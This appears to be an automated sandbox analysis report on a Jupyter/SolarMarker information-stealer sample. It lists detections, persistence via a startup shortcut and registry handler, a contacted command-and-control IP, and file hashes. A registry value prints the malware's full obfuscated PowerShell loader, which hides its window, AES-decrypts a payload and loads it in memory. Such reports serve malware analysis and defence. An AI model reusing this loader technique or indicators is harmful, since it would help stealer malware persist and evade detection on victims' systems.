Analysis Overview
SHA256
e864d8d2a93f38d2714ad1f0b5f79cef79d46022cd6b29c3ed8e52c8c79e7ff9
Threat Level: Known bad
The file ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.7z was found to be: Known bad.
Malicious Activity Summary
Jupyter, SolarMarker
suricata: ET MALWARE Jupyter Stealer CnC Checkin
Jupyter family
Blocklisted process makes network request
Drops startup file
Program crash
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Analysis: static1
Detonation Overview
Reported
2022-06-13 00:02
Signatures
Jupyter family
Analysis: behavioral1
Detonation Overview
Submitted
2022-06-13 00:01
Reported
2022-06-13 00:08
Platform
win10-20220414-en
Max time kernel
138s
Max time network
298s
Command Line
Signatures
Jupyter, SolarMarker
suricata: ET MALWARE Jupyter Stealer CnC Checkin
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QhGywHLreAszXutEwsWWihf.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('9Qw7HmyNbXwDhTl1BCWQ9HiCHVJ6biS29AI3joRqFsE=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\pVbWJYZDDCSHJ\\YmZzDuyJLaoZWFP.KQCAccTWwYOdCobshuYIIWjvAgPA'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[WMjltFazGzRYICFIoq5XoJDM1T0sO959lZpC3tdMx9r6rF4.aOQnwFCqXLWVnkObggxLLxB9CQD8t3NAI8E_o_VOjfEb3SskE3Fab05w_MOsLyIbBovKJMjkKSlk9pTjBqWv]::RRye6ZIFpv7n8DDuAo9IugHH9lFCZ();\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa\ = "znmroizkuvzkfkiogetiwusss" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe
"C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp" "c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2932 -s 944
Network
| Country | Destination | Domain | Proto |
| RO | 37.120.247.120:80 | 37.120.247.120 | tcp |
| US | 8.238.20.126:80 | N/A | tcp |
Files
memory/2932-114-0x0000000000720000-0x0000000001720000-memory.dmp
memory/4040-115-0x0000000000000000-mapping.dmp
memory/4040-121-0x000002122E240000-0x000002122E262000-memory.dmp
memory/4040-142-0x000002122E3E0000-0x000002122E41C000-memory.dmp
memory/4040-153-0x000002122E8F0000-0x000002122E966000-memory.dmp
memory/4340-230-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline
| MD5 | 1eeb07bec0c50ea3fde3eb7ebbf2696c |
| SHA1 | 9ab2dc69969b2b3567978960338ed5fb4bbdba06 |
| SHA256 | 377c3d45039c7df67f3e1779059c0aceb6be66e4a97c745e956840d005fe16b4 |
| SHA512 | f0bcd40d1bfc147c367dd8660f95780c4cae5df7f85fb161270e70029d9e4e9f4c3fa4f826cd286ce366361f41d755f28781d10a3a3300166cd8bc286b10c626 |
\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.0.cs
| MD5 | 2f9b4948ac0b26204994e246094a9f5d |
| SHA1 | 9870e53ad61eba593a2074d2a30202f7e3df09f7 |
| SHA256 | def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776 |
| SHA512 | ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1 |
memory/3708-233-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP
| MD5 | 1c11d3ae5fd77a79312b6c30d0a66553 |
| SHA1 | 96bf5d3745727569a87594103400b107da643152 |
| SHA256 | 9956ebc42062cb7aa5317cb483dc43b4ae186ccb41cd7b57a7ef22b0abe9a7d9 |
| SHA512 | bc137488d97f6bfe6cbd5107c23d3b497e0b2618c5a78b8c4eb3f0946cb13dcbc516b869446710e8f25be5cad2d0c319302d7edf2d5f4b171ac12ef436ccb239 |
C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp
| MD5 | 7323216a4b3cb72a8e4b9e18769a63d7 |
| SHA1 | e35e0b917b06e1bc586d031a5e27cdec42db5c17 |
| SHA256 | 1fd38a3bedb9b5e4337d8834eb2d1cfd87618959b92898accd49241b737bc900 |
| SHA512 | 54ae2c3fa700a400973cc3ad437bfa4c359dccddfcf9012921bc598dde0aa513f44047793018fc75e3159dbfb5a171a6a2f40a6a39dfbc44e69800a8eed2eaab |
C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.dll
| MD5 | e2fc3e1ad6b1857e10377afba34315a2 |
| SHA1 | b8b239cb809359e0d9893fe993cbf5fe3076cd91 |
| SHA256 | f8c6fb96d781568e280d1c524b63a1932d7abbec6fc8558f6b2959ba360758dd |
| SHA512 | 7adc76e3c25c01c4786433f9d76c4b4876165ca455192847077e673c90731d9b741d87962961b7c31f72dd2afdb7729b743143968b90f171d48cdedb8c2848a3 |
memory/4040-237-0x000002122E3B0000-0x000002122E3B8000-memory.dmp
memory/4368-329-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 2143b379fed61ab5450bab1a751798ce |
| SHA1 | 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e |
| SHA256 | a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81 |
| SHA512 | 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa |
memory/4040-383-0x000002122E970000-0x000002122EA34000-memory.dmp